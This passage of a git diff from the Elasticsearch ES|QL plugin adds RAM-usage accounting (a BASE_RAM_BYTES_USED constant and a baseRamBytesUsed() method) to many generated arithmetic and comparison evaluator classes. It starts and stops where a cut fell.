DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java index dbb4157798e4e..6965be6729e7d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MulIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java index 00433c86570c4..3f4b12014e144 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MulLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java index d3b0b3c6d54be..93e22f7b24a4d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MulUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java index ad0bbfd4f9bb7..49048917f14eb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NegDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock vBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java index bd186e723a86f..ef3aa7a183c26 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NegIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock vBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java index 2f2ef86cbaa3c..65f57ab1af862 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NegLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock vBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java index 7418d000281f1..6c64355b50b33 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java @@ -10,6 +10,7 @@ import java.lang.String; import java.time.DateTimeException; import java.time.temporal.TemporalAmount; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubDateNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDateNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator dateNanos; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dateNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock dateNanosBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java index 11a3a97416ef9..d8df3004d5667 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java @@ -10,6 +10,7 @@ import java.lang.String; import java.time.DateTimeException; import java.time.temporal.TemporalAmount; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubDatetimesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDatetimesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator datetime; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += datetime.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock datetimeBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java index 21776d21cadea..08c0130331211 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java index 8a2f431908406..d89463b65c9f9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java index 5ff2efe3f6683..61847eeb81696 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java index 856399ba0e4af..b59cae725fb93 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubUnsignedLongsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubUnsignedLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java index 70a3f0bd70aab..3c5c47424bd32 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsBoolsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsBoolsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsBoolsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock lhsBlock, BooleanBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java index 80e20c27d5485..064997668c6bd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java index 16f83442f79d5..12bf47ce25978 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsGeometriesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsGeometriesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsGeometriesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java index b78f45d7fbd1e..ae55fc132a740 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java index e65359e8ee156..376cde3ed2465 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java index c8bde6b05afd2..e81fe893b234e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = 